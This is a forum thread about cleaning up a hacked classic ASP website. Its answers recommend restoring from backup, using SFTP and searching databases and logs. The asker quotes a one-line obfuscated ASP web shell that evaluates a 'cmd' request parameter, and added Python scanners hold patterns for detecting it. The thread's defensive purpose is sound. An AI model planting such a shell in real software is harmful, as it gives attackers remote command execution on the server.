Cleaning up a hacked website

Posted on 2015-01-15
Medium Priority
Last Modified: 2015-01-22
I've been assigned to clean up a website that's been hacked somehow.

If I understand it correctly, the website runs ASP code (suspect it's not ASP.NET but not sure how to check) connecting to several Access databases. It also has a section of the site using the PHP CodeIgniter framework. It's suspected that the attacker initially gained access through a weak FTP password.

After an initial clean up and a change of the FTP password, more malicious activity was detected. I suppose it's possible the avenue for this attack may have been different to the initial one.

I've found 9 ASP files that are clearly malicious. However, I'm not particularly familiar with the code on the site and am very aware that I'm unlikely to find them all, so I'm trying to get hold of a backup prior to the initial hack, for comparison purposes. If available, I will try to restore the programming files to what was there prior to the hack.

Are there any tools I can use that might detect malicious files with reasonable accuracy? Are there any neat tricks I can use to at least detect malicious behaviour? Is there anything else that would be useful to know or try?
Question by:Terry Woods
LVL 12

Assisted Solution

Sommerblink earned 400 total points
ID: 40552054
I wish I could provide clever answers to your questions, but honestly I treat hacked websites/webservers like I treat virused/malware infected computers, wipe and reload the machine and restore from a known good backup.

Once a machine has been compromised, there is no guarantee that you can catch everything and undo the damage.

Good luck!
LVL 34

Assisted Solution

by:Paul MacDonald
Paul MacDonald earned 400 total points
ID: 40552065
Code is code and there's rarely a way to define intent without human intervention.  As it is, your best bet is to restore from a known good backup.  If that can't be done, you'll probably have to go through each page, one-at-a-time.  

Be aware the hacker may have compromised the operating system itself.  This wouldn't normally be possible, but if the web site and/or FTP site were running as users with sufficient permissions, the hacker could have put (or written code to put) files anywhere.
LVL 35

Accepted Solution

gr8gonzo earned 500 total points
ID: 40552171
As a side note - regular FTP is done over plain text. There's no encryption, so anyone that listens to the communication can see the password, no matter how complex / strong it is. Always use SFTP or FTPS (whatever your server supports) for transferring / managing files.

More often than not, hacks are due to vulnerabilities in the code or an unpatched system. Maybe the server hasn't been keeping up with security updates, or maybe you've downloaded some 3rd party code that had a vulnerability in it. For example, PHPMyAdmin was a common script that a lot of people used for years, but there were vulnerabilities in it and people could get hacked just by having it on their web server. There may be ASP equivalents.

ASP.NET code typically is in files with the extension .aspx, while classic ASP uses .asp as the extension.
LVL 34

Assisted Solution

by:Big Monty
Big Monty earned 500 total points
ID: 40552204
another place you'll want to check is in your database. if you have any kind of data collection (ex - forms) and you don't sanitize the input, hackers in theory could save malicious html and when that data is written out to the screen, you have been hacked.

do a search in any text or varchar fields in your database on the string "<script" (w/out the quotes) and that'll tell you if any bad scripts have been saved to your database
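A scripted version of that database check, added here as an example rather than anything posted in the thread: it enumerates every text-like column in a database and searches each one case-insensitively for a few stored-XSS markers, not just "<script". It assumes an in-memory SQLite database with constructed sample rows as a stand-in for the site's Access files; against the real site the same search would run over an ODBC connection.

```python
import sqlite3

# Markers that indicate HTML/JS stored in data that should have been plain text.
SUSPICIOUS_MARKERS = ("<script", "javascript:", "onerror=", "<iframe")


def build_sample_db() -> sqlite3.Connection:
    """Constructed sample data (not from the thread): one form table with a
    tainted submission, and one table with no text columns of interest."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE contact_form (id INTEGER PRIMARY KEY, name TEXT, message TEXT);
        CREATE TABLE products (id INTEGER PRIMARY KEY, title TEXT, price REAL);
        INSERT INTO contact_form (name, message) VALUES
          ('Alice', 'Please call me back'),
          ('Bob', 'great site <SCRIPT src="http://example.invalid/x.js"></SCRIPT>');
        INSERT INTO products (title, price) VALUES ('Widget', 9.99);
    """)
    return conn


def text_columns(conn):
    """Yield (table, column) for every TEXT/CHAR-typed column in the database."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table'")]
    for table in tables:
        # PRAGMA table_info rows: cid, name, type, notnull, dflt_value, pk
        for _, col, ctype, *_ in conn.execute(f'PRAGMA table_info("{table}")'):
            if "CHAR" in ctype.upper() or "TEXT" in ctype.upper():
                yield table, col


def find_tainted_rows(conn, markers=SUSPICIOUS_MARKERS):
    """Return (table, column, rowid, value) for each text cell containing a marker.
    lower() on both sides makes the match case-insensitive, so 'SCRIPT' is caught."""
    hits = []
    for table, col in text_columns(conn):
        for marker in markers:
            rows = conn.execute(
                f'SELECT rowid, "{col}" FROM "{table}" WHERE lower("{col}") LIKE ?',
                (f"%{marker.lower()}%",))
            hits.extend((table, col, rowid, value) for rowid, value in rows)
    return hits


if __name__ == "__main__":
    for hit in find_tainted_rows(build_sample_db()):
        print(hit)
```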
LVL 35

Author Comment

by:Terry Woods
ID: 40552236
It's pretty much as I thought then. I'm waiting to see what backups I have available. I suspect I may have to retain the current copy of the databases though, so @Big_Monty's suggestion on what to look for in the databases could be very useful.

I thought the contents of this .asp file were interesting:
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("cmd"))%

The characters spell out "request". Would this be malicious by any chance? This particular file was date stamped differently to the other malicious ones I found, but I guess one of the easy hacker tricks would be to encourage the victim to think they have found all the malicious files through date stamping most of them with the date of the hack... anyway, I'm not going to put much more time into trying to find individual files since it's probably a fruitless exercise.
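The chr()-concatenation trick in that file is easy to scan for mechanically. The following is an added example (not code from the thread or the site): it decodes every run of chr(N) calls joined with + or & back into the literal it builds, then flags any file where eval/execute is applied to request input once de-obfuscated. The sample snippet is constructed to mirror the pattern quoted above, and the directory walk assumes classic ASP files end in .asp.

```python
import os
import re

# Constructed sample in the shape of the file quoted above (not the site's actual file).
SAMPLE_ASP = '<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("cmd"))%>'

# A run of two or more chr(N) calls joined with '+' or '&' (VBScript accepts either).
CHR_RUN = re.compile(r'(?:chr\(\s*\d{1,3}\s*\)\s*[+&]\s*)+chr\(\s*\d{1,3}\s*\)', re.IGNORECASE)
CHR_NUM = re.compile(r'chr\(\s*(\d{1,3})\s*\)', re.IGNORECASE)

# After decoding, code that hands request-supplied text to the interpreter is the red flag.
SUSPICIOUS = re.compile(r'\b(eval|execute|executeglobal)\b.*\brequest\b', re.IGNORECASE)


def decode_chr_runs(source: str) -> str:
    """Replace each chr()-concatenation run with the quoted string it assembles."""
    def repl(match):
        return '"' + ''.join(chr(int(n)) for n in CHR_NUM.findall(match.group(0))) + '"'
    return CHR_RUN.sub(repl, source)


def scan_asp(source: str) -> dict:
    """Report how many obfuscated runs were found, the decoded text, and whether
    the decoded text shows eval/execute being fed from the request."""
    decoded = decode_chr_runs(source)
    return {
        "obfuscated_runs": len(CHR_RUN.findall(source)),
        "decoded": decoded,
        "suspicious": bool(SUSPICIOUS.search(decoded)),
    }


def scan_tree(root: str, extensions=(".asp", ".asa", ".inc")) -> list:
    """Walk a web root and return paths of files the scanner flags as suspicious."""
    flagged = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(extensions):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1", errors="replace") as fh:
                    if scan_asp(fh.read())["suspicious"]:
                        flagged.append(path)
    return flagged


if __name__ == "__main__":
    print(scan_asp(SAMPLE_ASP))
```

Files that only reference Request.Form or Request.QueryString for ordinary output are not flagged; the hit requires an eval/execute in the same statement as request data.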
LVL 34

Expert Comment

by:Big Monty
ID: 40552262
most likely that page is a hack as well, do a search for that string and some shady sites come up talking about viruses and trojans....
LVL 54

Assisted Solution

by:Scott Fell, EE MVE
Scott Fell, EE MVE earned 200 total points
ID: 40558397
It's possible that they used code to create files on the fly.  I would look at the logs too and see if you can find some odd query string requests on a particular page.
LVL 35

Author Closing Comment

by:Terry Woods
ID: 40563794
Thanks all for your help!
